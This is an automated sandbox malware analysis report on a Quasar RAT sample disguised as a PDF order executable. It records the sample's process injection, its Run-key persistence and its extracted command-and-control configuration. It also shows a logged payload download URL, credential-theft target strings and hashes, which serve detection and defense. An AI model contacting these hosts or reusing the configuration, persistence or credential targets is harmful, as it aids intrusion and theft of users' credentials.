
Windows Analysis Report
Order88983273293729387293828PDF.exe

Overview

General Information

Sample name: Order88983273293729387293828PDF.exe
Analysis ID: 1557778
MD5: 9c23449ea828b1d7d4473aa70f86caa8
SHA1: 474136c0e6d3d7c00a2e4f1b1e41f831fbb6dcba
SHA256: 7c9b4c774fbf907cf1858ea31454992e16d6b6521f880fcd8a12433ce25b6b35
Tags: exe, user-lowmal3

Detection

Quasar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Quasar RAT
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Order88983273293729387293828PDF.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\Order88983273293729387293828PDF.exe" MD5: 9C23449EA828B1D7D4473AA70F86CAA8)
    • InstallUtil.exe (PID: 5948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • windows update.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Roaming\SubDir\windows update.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • conhost.exe (PID: 5832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • windows update.exe (PID: 1360 cmdline: "C:\Users\user\AppData\Roaming\SubDir\windows update.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • windows update.exe (PID: 4308 cmdline: "C:\Users\user\AppData\Roaming\SubDir\windows update.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
Name: Quasar RAT, QuasarRAT
Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
{"Version": "1.4.1", "Host:Port": "nwamama.ydns.eu:3791;", "SubDirectory": "SubDir", "InstallName": "windows update.exe", "MutexName": "3302836a-f2f9-4646-981e-42b54ed610dd", "Tag": "man", "LogDirectoryName": "Logs"}
Yara matches (memory dumps): Source | Rule | Description | Author
00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
00000000.00000002.2252532940.00000000068C0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
(8 further entries not shown)
Yara matches (unpacked PE files): Source | Rule | Description | Author | Strings
0.2.Order88983273293729387293828PDF.exe.68c0000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Order88983273293729387293828PDF.exe.40d6ed0.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth
  • 0x28d09d:$x1: Quasar.Common.Messages
  • 0x29d3c6:$x1: Quasar.Common.Messages
  • 0x2a9a16:$x4: Uninstalling... good bye :-(
  • 0x2ab20b:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen
  • 0x2a8fc8:$f1: FileZilla\recentservers.xml
  • 0x2a9008:$f2: FileZilla\sitemanager.xml
  • 0x2a904a:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
  • 0x2a9296:$b1: Chrome\User Data\
  • 0x2a92ec:$b1: Chrome\User Data\
  • 0x2a95c4:$b2: Mozilla\Firefox\Profiles
  • 0x2a96c0:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x2fb644:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x2a9818:$b4: Opera Software\Opera Stable\Login Data
  • 0x2a98d2:$b5: YandexBrowser\User Data\
  • 0x2a9940:$b5: YandexBrowser\User Data\
  • 0x2a9614:$s4: logins.json
  • 0x2a934a:$a1: username_value
  • 0x2a9368:$a2: password_value
  • 0x2a9654:$a3: encryptedUsername
  • 0x2fb588:$a3: encryptedUsername
  • 0x2a9678:$a4: encryptedPassword
  • 0x2fb5a6:$a4: encryptedPassword
  • 0x2fb524:$a5: httpRealm
(12 further entries not shown)

                  System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\SubDir\windows update.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 5948, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost
                  No Suricata rule has matched


                  AV Detection

Source: 00000002.00000002.2240428328.0000000003231000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "nwamama.ydns.eu:3791;", "SubDirectory": "SubDir", "InstallName": "windows update.exe", "MutexName": "3302836a-f2f9-4646-981e-42b54ed610dd", "Tag": "man", "LogDirectoryName": "Logs"}
Source: Order88983273293729387293828PDF.exe | ReversingLabs: Detection: 36%
Source: Yara match | File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 5948, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Order88983273293729387293828PDF.exe | Joe Sandbox ML: detected
Source: Order88983273293729387293828PDF.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
Source: unknown | HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: Order88983273293729387293828PDF.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp, windows update.exe, 00000003.00000000.2232242455.0000000000472000.00000002.00000001.01000000.00000007.sdmp, windows update.exe.2.dr
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp, windows update.exe, 00000003.00000000.2232242455.0000000000472000.00000002.00000001.01000000.00000007.sdmp, windows update.exe.2.dr
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Code function: 4x nop then jmp 0489EDC8h | 0_2_0489ECA8
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Code function: 4x nop then jmp 0489EDC8h | 0_2_0489ECB8
Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe | Code function: 4x nop then jmp 0489EDC8h | 0_2_0489EE94

                  Networking

Source: Malware configuration extractor | URLs: nwamama.ydns.eu
Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /mansa/Vurfw.wav HTTP/1.1 Host: www.oleonidas.gr Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 185.78.221.73 185.78.221.73
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /mansa/Vurfw.wav HTTP/1.1 Host: www.oleonidas.gr Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: www.oleonidas.gr
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://entityframework-plus.net/
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2240428328.0000000003231000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: Order88983273293729387293828PDF.exe | String found in binary or memory: http://www.zzzprojects.com
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bulk-operations.net
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bulk-operations.net$Microsoft.Data.SqlClient.SqlBulkCopyEThe
Source: Order88983273293729387293828PDF.exe | String found in binary or memory: https://bulk-operations.net/pricing.
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dapper-plus.net
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dapper-plus.net#Oops
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping.
Source: Order88983273293729387293828PDF.exe | String found in binary or memory: https://dapper-plus.net/pricing.
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://entityframework-extensions.net/)
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://entityframework-extensions.net/include-graph).
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://entityframework-extensions.net/md5-exception
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://entityframework-extensions.net/md5-exceptionX
Source: Order88983273293729387293828PDF.exe | String found in binary or memory: https://entityframework-extensions.net/pricing.
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://ipwho.is/
Source: Order88983273293729387293828PDF.exe | String found in binary or memory: https://linqtosql-plus.net/pricing.
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.oleonidas.gr
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.oleonidas.gr/mansa/Vurfw.wav
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2

                  E-Banking Fraud

Source: Yara match | File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 5948, type: MEMORYSTR

                  System Summary

                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                  Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                  Source: initial sampleStatic PE information: Filename: Order88983273293729387293828PDF.exe
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489C6A0 NtResumeThread,0_2_0489C6A0
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489B668 NtProtectVirtualMemory,0_2_0489B668
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489C698 NtResumeThread,0_2_0489C698
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489B660 NtProtectVirtualMemory,0_2_0489B660
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00F241200_2_00F24120
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00F2347B0_2_00F2347B
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00F2DE480_2_00F2DE48
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_00F2DE380_2_00F2DE38
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_04897F300_2_04897F30
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048930780_2_04893078
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489239D0_2_0489239D
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_0489A6F00_2_0489A6F0
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048950880_2_04895088
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048950980_2_04895098
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048D5A500_2_048D5A50
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048DBCF30_2_048DBCF3
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_048D5A4B0_2_048D5A4B
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072DF6580_2_072DF658
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072DE9D00_2_072DE9D0
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072C003E0_2_072C003E
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeCode function: 0_2_072C00400_2_072C0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0180EFE42_2_0180EFE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_058593B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_05850508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_05850518
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.000000000293E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.000000000392B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2217629583.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameClient.exe. vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000000.2128066751.0000000000452000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameLhohepjghy.exe6 vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2254840027.0000000007230000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe | Binary or memory string: OriginalFilenameLhohepjghy.exe6 vs Order88983273293729387293828PDF.exe
Source: Order88983273293729387293828PDF.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
